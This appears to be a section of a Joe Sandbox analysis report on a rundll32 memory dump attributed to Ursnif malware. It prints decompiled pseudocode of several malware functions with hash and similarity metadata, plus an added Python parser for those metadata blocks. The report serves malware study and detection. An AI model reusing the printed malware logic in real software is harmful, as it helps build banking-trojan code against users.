                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 525f0df1c76ad394142b653e81303e0a5843d8a69b6c4eea07958f6a164e71ff
                                                  • Instruction ID: 656ead118c81b683a88a04eadadb487b78c7c26fb7965be78d0062f7854d6d6c
                                                  • Opcode Fuzzy Hash: 525f0df1c76ad394142b653e81303e0a5843d8a69b6c4eea07958f6a164e71ff
                                                  • Instruction Fuzzy Hash: 98312AB2900119AFCB21DFA5C888CDBBB7AFFC97407154658F9559B210E232ED91CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                   • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f368187c814687b12e269be5046e12e2a48495bc28e53bcf70605adc70745d28
                                                  • Instruction ID: 5fd74d56164a6c0d5ab31076f9ad3735f7eec535e671e57ba02fd48fbef279fc
                                                  • Opcode Fuzzy Hash: f368187c814687b12e269be5046e12e2a48495bc28e53bcf70605adc70745d28
                                                  • Instruction Fuzzy Hash: AB310AB1A00209EFEB15DF69D894AAEB7F9EF58310B204069E945D7210F734EE819B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                   • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af0fd6fa802b84e5214a088408984adb1bc22f89e794da2d8089d8434daf3c10
                                                  • Instruction ID: 0a3b8a33bbc3c0e3d7bb410f67ad9fbfa232b1ab5e421aa4ebfc972d08e73ddf
                                                  • Opcode Fuzzy Hash: af0fd6fa802b84e5214a088408984adb1bc22f89e794da2d8089d8434daf3c10
                                                  • Instruction Fuzzy Hash: CD31E776A00109EFCB05CF98D4C48EE7BB5FF58340B10842EE94AA7310E775AAC5CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 62%
E046B73FD(void* __edx) {
	char _v8;
	char _v12;
	char _v16;
	void* __esi;
	void* _t23;
	intOrPtr _t24;
	void* _t26;
	intOrPtr _t32;
	intOrPtr _t35;
	void* _t37;
	intOrPtr _t38;
	void* _t40;
	intOrPtr _t42;
	void* _t45;
	void* _t50;
	intOrPtr* _t52;
	void* _t55;

	_t50 = __edx;
	_v12 = 0;
	_t23 = E046BA72D(0,  &_v8); // executed
	if(_t23 != 0) {
		_v8 = 0;
	}
	_t24 =  *0x46bd27c; // 0x96a5a8
	_t4 = _t24 + 0x46bede0; // 0x5029388
	_t5 = _t24 + 0x46bed88; // 0x4f0053
	_t26 = E046B1262( &_v16, _v8, _t5, _t4); // executed
	_t45 = _t26;
	if(_t45 == 0) {
		 *0x46bd0f4(_v16, 0,  &_v12);
		_t52 = __imp__; // 0x75145520
		_t45 = 8;
		if(_v12 < _t45) {
			_t45 = 1;
			__eflags = 1;
		} else {
			_t32 =  *0x46bd27c; // 0x96a5a8
			_t11 = _t32 + 0x46bedd4; // 0x502937c
			_t48 = _t11;
			_t12 = _t32 + 0x46bed88; // 0x4f0053
			_t55 = E046B7CB8(_t11, _t12, _t11);
			_t59 = _t55;
			if(_t55 != 0) {
				_t35 =  *0x46bd27c; // 0x96a5a8
				_t13 = _t35 + 0x46bee1e; // 0x30314549
				_t37 = E046B89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
				if(_t37 == 0) {
					_t61 =  *0x46bd25c - 6;
					if( *0x46bd25c <= 6) {
						_t42 =  *0x46bd27c; // 0x96a5a8
						_t15 = _t42 + 0x46bec2a; // 0x52384549
						E046B89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
					}
				}
				_t38 =  *0x46bd27c; // 0x96a5a8
				_t17 = _t38 + 0x46bee18; // 0x50293c0
				_t18 = _t38 + 0x46bedf0; // 0x680043
				_t40 = E046B2659(_v8, 0x80000001, _t55, _t18, _t17);
				_t45 = _t40;
				 *_t52( *0x46bd238, 0, _t55);
			}
		}
		 *_t52( *0x46bd238, 0, _v16);
	}
	_t54 = _v8;
	if(_v8 != 0) {
		E046B1F99(_t54);
	}
	return _t45;
}

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13473747d2a5f3c3736c04aca7062299887c47d85f7dc9eeb749cd2aee10b481
• Instruction ID: 2834c738d6fdbc9bf7e106a74963679a5957ec3f88143d3a242f8afe532d824f
• Opcode Fuzzy Hash: 13473747d2a5f3c3736c04aca7062299887c47d85f7dc9eeb749cd2aee10b481
• Instruction Fuzzy Hash: 6B319075910208BFEB21DBE4DC84DDA7BACEB44305F144066A644AB260F3B1EEC4DBD4
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 64%
E046B7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
	void* _v8;
	void* _v12;
	void* _v16;
	intOrPtr _t22;
	void* _t24;
	intOrPtr* _t26;
	intOrPtr* _t28;
	void* _t32;
	intOrPtr* _t33;
	intOrPtr _t36;
	intOrPtr* _t39;
	void* _t46;

	_t22 =  *0x46bd27c; // 0x96a5a8
	_t2 = _t22 + 0x46be0dc; // 0x5028684
	_t3 = _t22 + 0x46be0cc; // 0x4590f811
	_t39 = 0;
	_v12 = 0;
	_t24 =  *0x46bd15c(_t3, 0, 1, _t2,  &_v16); // executed
	_t46 = _t24;
	if(_t46 >= 0) {
		if(_a8 != 0) {
			_t36 =  *0x46bd27c; // 0x96a5a8
			_t8 = _t36 + 0x46be3b8; // 0x5f005f
			E046B908B(_t8, _a8,  &_v12);
			_t39 = _v12;
		}
		_t26 = _v16;
		_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
		if(_t46 >= 0) {
			_t32 =  *0x46bd158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
			_t46 = _t32;
			_t33 = _v8;
			if(_t46 < 0) {
				 *((intOrPtr*)( *_t33 + 8))(_t33);
			} else {
				 *_a12 = _t33;
			}
		}
		if(_t39 != 0) {
			 *((intOrPtr*)( *_t39 + 8))(_t39);
		}
		_t28 = _v16;
		 *((intOrPtr*)( *_t28 + 8))(_t28);
	}
	return _t46;
}

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4199f91ee2139fd74a43aa1a4ac64e447a2e93398019b7c07b86c64f2557c1d3
• Instruction ID: a2183a3340d77254780a8ba35bd06b46935ab63c1f28d7073d2c0eef0fcab974
• Opcode Fuzzy Hash: 4199f91ee2139fd74a43aa1a4ac64e447a2e93398019b7c07b86c64f2557c1d3
• Instruction Fuzzy Hash: 51213075600218BFCB11DFA4C888DCEBBBDEF89755B008455F506DB340E675AE85CBA0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bae1a4206a937faab4ab5dff816f0e344a9c5ed8b99106d3b36cc86c93809f04
• Instruction ID: 4c2d365e9c2de9e24e8dd572347817f793abc607c84aa3a0507b148cfc3502ca
• Opcode Fuzzy Hash: bae1a4206a937faab4ab5dff816f0e344a9c5ed8b99106d3b36cc86c93809f04
• Instruction Fuzzy Hash: 7C2119B2900218BFDB11AF95CC45ADEBFBDEF08740F10406AF640B6210E7759B949BE0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 53%
E046B43DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
	signed int _v8;
	void* _t19;
	signed int _t21;
	intOrPtr _t22;
	intOrPtr* _t26;
	signed int _t27;
	intOrPtr* _t28;
	signed int _t29;
	intOrPtr* _t30;
	intOrPtr* _t32;
	intOrPtr* _t35;
	intOrPtr* _t40;
	intOrPtr _t43;
	intOrPtr _t45;
	intOrPtr* _t49;
	intOrPtr* _t51;

	_t51 = E046B2049(_t19, 0xc);
	if(_t51 == 0) {
		_t21 = 8;
	} else {
		_t22 =  *0x46bd27c; // 0x96a5a8
		_t1 = _t22 + 0x46be058; // 0x5028600
		_t2 = _t22 + 0x46be028; // 0x2df01
		_t24 =  *0x46bd15c(_t2, 0, 4, _t1, _t51); // executed
		_v8 = _t24;
		if(_t24 < 0) {
			L8:
			E046B9039(_t24, _t51);
			_t21 = _v8;
		} else {
			_t43 =  *0x46bd27c; // 0x96a5a8
			_t26 =  *_t51;
			_t4 = _t51 + 4; // 0x4
			_t35 = _t4;
			_t5 = _t43 + 0x46be048; // 0xd30c1661
			_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
			_v8 = _t27;
			_t28 =  *_t51;
			_t40 =  *_t28;
			if(_t27 < 0) {
				L6:
				_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
			} else {
				_t45 =  *0x46bd27c; // 0x96a5a8
				_t7 = _t51 + 8; // 0x8
				_t49 = _t7;
				_t8 = _t45 + 0x46be068; // 0x2df05
				_t29 =  *_t40(_t28, _t8, _t49);
				_v8 = _t29;
				if(_t29 < 0) {
					_t30 =  *_t35;
					 *((intOrPtr*)( *_t30 + 8))(_t30);
					_t28 =  *_t51;
					_t40 =  *_t28;
					goto L6;
				} else {
					_t32 =  *_t49;
					 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
					_t24 = _a4;
					_a4 = _a4 & 0x00000000;
					 *_a4 = _t51;
				}
			}
			if(_v8 >= 0) {
				_t21 = _a4;
			} else {
				goto L8;
			}
		}
	}
	return _t21;
}

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
• Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
• Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7af369b383d514ffdb0183693e503474be33de82155dd4e4d1258d81f7daf077
• Instruction ID: 9821f6a98381219eb9da5f9f6c4b628bfd392f45efdef33f852b8c0fa9f1160c
• Opcode Fuzzy Hash: 7af369b383d514ffdb0183693e503474be33de82155dd4e4d1258d81f7daf077
• Instruction Fuzzy Hash: AF2126B5600604EFE710CFA4C888F9A73B8EF89708F108558E645CF251EB75EA85CBE0
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 35%
E046B1A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
	intOrPtr _v8;
	void* _v12;
	char _v16;
	intOrPtr _t26;
	intOrPtr* _t28;
	intOrPtr _t31;
	intOrPtr* _t32;
	intOrPtr _t37;
	intOrPtr _t44;
	void* _t46;

	_push( &_v12);
	_push(__eax);
	_t37 = 0;
	_t44 = 0; // executed
	_t26 =  *((intOrPtr*)( *__eax + 0x24))();
	_v8 = _t26;
	if(_t26 < 0) {
		L13:
		return _v8;
	}
	if(_v12 == 0) {
		__imp__(0xc8);
		_push( &_v12);
		_push(__eax);
		_v8 =  *((intOrPtr*)( *__eax + 0x24))();
	}
	if(_v8 >= _t37) {
		_t28 = _v12;
		if(_t28 != 0) {
			_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
			_v8 = _t31;
			if(_t31 >= 0) {
				__imp__(_v16);
				_t44 = _t31;
				if(_t44 != 0) {
					_t44 = _t44 + 1;
					_t46 = _t44 + _t44;
					_t37 = E046B2049(_t31, _t46);
					if(_t37 == 0) {
						_v8 = 0x8007000e;
					} else {
						_push(_t46);
						_push(_v16);
						_push(_t37);
						L046B5544();
					}
					__imp__#6(_v16);
				}
			}
			_t32 = _v12;
			 *((intOrPtr*)( *_t32 + 8))(_t32);
		}
		 *_a4 = _t37;
		 *_a8 = _t44 + _t44;
	}
	goto L13;
}

                                                  • Instruction address column for the listing above (alignment lost in extraction): 0x046b1a80 to 0x046b1b2c in the rundll32 dump at 0x046B0000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f22f302503a1b32098996ff14dc56fd516dc1eb5df228daa037893221ec9ac3
                                                  • Instruction ID: 552f0b49f7f8c70831197371e5cf427fe7f0de424a83f0dfa50ddde461c3bd5a
                                                  • Opcode Fuzzy Hash: 0f22f302503a1b32098996ff14dc56fd516dc1eb5df228daa037893221ec9ac3
                                                  • Instruction Fuzzy Hash: 4D214F75A00209FFCB10DFA4D998DDEBBB5EF49345B14416DE845D7210F731AA85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E046B8504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				char _v8;
                                                  				void* __edi;
                                                  				intOrPtr _t18;
                                                  				void* _t23;
                                                  				void* _t28;
                                                  				void* _t35;
                                                  				char _t38;
                                                  				intOrPtr _t40;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t40 =  *0x46bd340; // 0x5028d39
                                                  				_push(0x800);
                                                  				_push(0);
                                                  				_push( *0x46bd238);
                                                  				if( *0x46bd24c >= 5) { // *0x46bd24c counts consecutive failures: incremented at L10 on every failure, cleared on success only while still below 5, so once it reaches 5 the other import is used from then on
                                                  					__imp__();
                                                  					if(__eax == 0) {
                                                  						L6:
                                                  						_t28 = 8;
                                                  						L7:
                                                  						if(_t28 != 0) {
                                                  							L10:
                                                  							 *0x46bd24c =  *0x46bd24c + 1;
                                                  							L11:
                                                  							return _t28;
                                                  						}
                                                  						_t42 = _a4;
                                                  						_t38 = _v8;
                                                  						 *_a16 = _a4;
                                                  						 *_a20 = E046B2496(_a4, _t38); // executed
                                                  						_t18 = E046BA66E(_t35, _t38, _t42); // executed
                                                  						if(_t18 != 0) {
                                                  							 *_a8 = _t38;
                                                  							 *_a12 = _t18;
                                                  							if( *0x46bd24c < 5) {
                                                  								 *0x46bd24c =  *0x46bd24c & 0x00000000;
                                                  							}
                                                  							goto L11;
                                                  						}
                                                  						_t28 = 0xbf;
                                                  						E046BA1B0();
                                                  						__imp__( *0x46bd238, 0, _t38); // executed
                                                  						goto L10;
                                                  					}
                                                  					_t23 = E046BA279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
                                                  					L5:
                                                  					_t28 = _t23;
                                                  					goto L7;
                                                  				}
                                                  				__imp__(); // executed
                                                  				if(__eax == 0) {
                                                  					goto L6;
                                                  				}
                                                  				_t23 = E046B8B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
                                                  				goto L5;
                                                  			}

                                                  • Instruction address column for the listing above (alignment lost in extraction): 0x046b8507 to 0x046b85cb in the rundll32 dump at 0x046B0000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
                                                  • Instruction ID: 21999aa7b902423880f76f466de5af323f43369731e6728134eadc5091b773c4
                                                  • Opcode Fuzzy Hash: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
                                                  • Instruction Fuzzy Hash: 40212F76200204EFEB51AF95DC84EDA37ACEB49354F00402AFA419B240FB75EEC59BE5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 982ae206d63e5696c4a8b46e76f0dd5af4ab124cc63f82c4546ae09c766349d8
                                                  • Instruction ID: 638cabaa3c93c2fedcb9811a04f5b9e15842a5c5d487197beedfb1f4e7b4a173
                                                  • Opcode Fuzzy Hash: 982ae206d63e5696c4a8b46e76f0dd5af4ab124cc63f82c4546ae09c766349d8
                                                  • Instruction Fuzzy Hash: 5E2141B5D0025DFFEB119F94DC84EEEBB79EB48304F000065EA50A62A1E7755E85DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4421bbb6c10063517416e6ae9fff2876a3e987f9368b7516d06aa1775ea86b35
                                                  • Instruction ID: 5a8a18d43779bbdace93b7c804424763469b0cc34435f302fb47579a088eaa47
                                                  • Opcode Fuzzy Hash: 4421bbb6c10063517416e6ae9fff2876a3e987f9368b7516d06aa1775ea86b35
                                                  • Instruction Fuzzy Hash: 9C210576640604BBD7219BA8CC05FDA37B8EB48740F144165F605EB280F6B1AA818BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
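The Memory Dump Source / Similarity / Uniqueness blocks repeated under every function are the part of this report worth machine-reading: the Opcode ID, Instruction ID and the two fuzzy hashes are what you compare against other Ursnif dumps. The parser below is an added example, not part of the Joe Sandbox report and not Joe Security's tooling. Field names follow the report text; the sample input is transcribed from two blocks above and labelled as constructed. The decoding of the dotted .sdmp file name into process index, dump pass, dump id, base address, page protection and memory type is an assumption of mine (it matches the values seen here: 0x1F = 31 and 2 as in hcaresult_31_2_…, 0x20 = PAGE_EXECUTE_READ, 0x20000 = MEM_PRIVATE); the record and helper names are also mine.

```python
"""Parse the per-function metadata blocks Joe Sandbox prints under each decompiled
function (Memory Dump Source / Similarity / Uniqueness) into records that can be
compared across reports. Added example, not part of the report or Joe Security's code.
The decoding of the dotted .sdmp name (process index, dump pass, dump id, base, page
protection, memory type) is an assumption that matches the values seen in this report."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
# Constructed sample: two blocks transcribed from this report (the second abridged).
SAMPLE = """\
Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
Similarity
• Opcode ID: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
• Instruction ID: 21999aa7b902423880f76f466de5af323f43369731e6728134eadc5091b773c4
• Opcode Fuzzy Hash: b76cf26add51fcdba24a6a8b26f1e1c6a24c4c93e708351846b0c302c7ced8e2
• Instruction Fuzzy Hash: 40212F76200204EFEB51AF95DC84EDA37ACEB49354F00402AFA419B240FB75EEC59BE5
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
• Opcode ID: 982ae206d63e5696c4a8b46e76f0dd5af4ab124cc63f82c4546ae09c766349d8
• Instruction Fuzzy Hash: 5E2141B5D0025DFFEB119F94DC84EEEBB79EB48304F000065EA50A62A1E7755E85DFA0
Uniqueness Score: -1.00%
"""

# winnt.h values used to label the protection / type fields of a dump name (assumed meaning).
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEMORY_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?\d+(?:\.\d+)?)%$")

@dataclass
class DumpRegion:
    process_index: int
    dump_pass: int
    dump_id: int
    base: int
    protection: str
    mem_type: str

@dataclass
class FunctionRecord:
    source: DumpRegion
    offset: int                      # "Offset:" value the listing is rebased to
    based_on_pe: bool
    associated: List[DumpRegion] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)   # remaining bullet fields by name
    uniqueness_score: Optional[float] = None

def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode one dotted .sdmp file name (assumed layout, see the docstring above)."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"unrecognised dump name: {name!r}")
    prot, mtype = int(m[5], 16), int(m[6], 16)
    return DumpRegion(int(m[1], 16), int(m[2], 16), int(m[3]), int(m[4], 16),
                      PAGE_PROTECTION.get(prot, f"0x{prot:x}"), MEMORY_TYPE.get(mtype, f"0x{mtype:x}"))

def parse_source_line(val: str):
    """'NAME.sdmp, Offset: 046B0000, based on PE: true' -> (region, offset, based_on_pe)."""
    name, *rest = [p.strip() for p in val.split(",")]
    opts = dict(p.split(":", 1) for p in rest)
    offset = int(opts.get("Offset", "0").strip(), 16)
    pe = opts.get("based on PE", "").strip().lower() == "true"
    return parse_sdmp_name(name), offset, pe

def parse_report(text: str) -> List[FunctionRecord]:
    """One record per 'Memory Dump Source' block; non-bullet lines are ignored."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in (l.strip() for l in text.splitlines()):
        if line == "Memory Dump Source":
            cur = None                   # the next "Source File" line opens a new record
        elif (score := SCORE_RE.match(line)) and cur is not None:
            cur.uniqueness_score = float(score[1])
        elif (m := FIELD_RE.match(line)) is not None:
            key, val = m[1].strip(), m[2].strip()
            if key == "Source File":
                cur = FunctionRecord(*parse_source_line(val))
                records.append(cur)
            elif key == "Associated" and cur is not None:
                cur.associated.append(parse_sdmp_name(val))
            elif cur is not None:
                cur.fields[key] = val
    return records

def group_by(records: List[FunctionRecord], key: str) -> Dict[str, List[FunctionRecord]]:
    """Group records sharing a Similarity value, e.g. the same 'Opcode ID' or fuzzy hash."""
    out: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        if r.fields.get(key):
            out.setdefault(r.fields[key], []).append(r)
    return out
```

Feed the text of the whole function section to parse_report, then group_by on "Opcode ID" or "Instruction Fuzzy Hash" across several reports to find the functions this dump shares with other samples; the "Uniqueness Score: -1.00%" values seen throughout this section are carried through as -1.0 so they can be filtered out rather than mistaken for a real score.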

                                                  C-Code - Quality: 86%
                                                  			E046B3D0D(intOrPtr* _a4, void* _a8) {
                                                  				void _v31;
                                                  				char _v32;
                                                  				void* _t17;
                                                  				void* _t19;
                                                  				intOrPtr _t21;
                                                  				void* _t23;
                                                  				signed int _t25;
                                                  				signed int _t26;
                                                  				intOrPtr _t31;
                                                  				void* _t32;
                                                  				intOrPtr _t40;
                                                  
                                                  				_t25 = 6;
                                                  				_v32 = 0;
                                                  				memset( &_v31, 0, _t25 << 2);
                                                  				_t26 = 0;
                                                  				asm("stosw");
                                                  				asm("stosb");
                                                  				_t31 = 0; // executed
                                                  				_t17 = E046B83B7( *0x46bd258,  &_v32); // executed
                                                  				if(_t17 != 0 && _v31 > 2) {
                                                  					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
                                                  					_t26 = 0;
                                                  					if(_t23 > 0) {
                                                  						do {
                                                  							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
                                                  							_t26 = _t26 + 1;
                                                  						} while (_t26 < _t23);
                                                  					}
                                                  				}
                                                  				_t39 = _t31;
                                                  				 *0x46bd270 = _t31;
                                                  				if(_t31 != 0) {
                                                  					L8:
                                                  					_t19 = E046B924F( &_a8); // executed
                                                  					__eflags = _t19;
                                                  					if(_t19 == 0) {
                                                  						__eflags = _a8 - 0x1000;
                                                  						if(_a8 == 0x1000) {
                                                  							goto L10;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t21 = E046B7923(_t26, _t39);
                                                  					_t40 =  *0x46bd270; // 0xd448b889
                                                  					 *_a8 = _t21;
                                                  					if(_t40 != 0) {
                                                  						goto L8;
                                                  					} else {
                                                  						if(_t21 == 0) {
                                                  							L10:
                                                  							_push(5);
                                                  							_pop(0);
                                                  						} else {
                                                  							 *_a4 = 1;
                                                  							 *0x46bd270 = _t21;
                                                  						}
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}

                                                  • Instruction address column for the listing above (alignment lost in extraction): 0x046b3d18 to 0x046b3da8 in the rundll32 dump at 0x046B0000

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
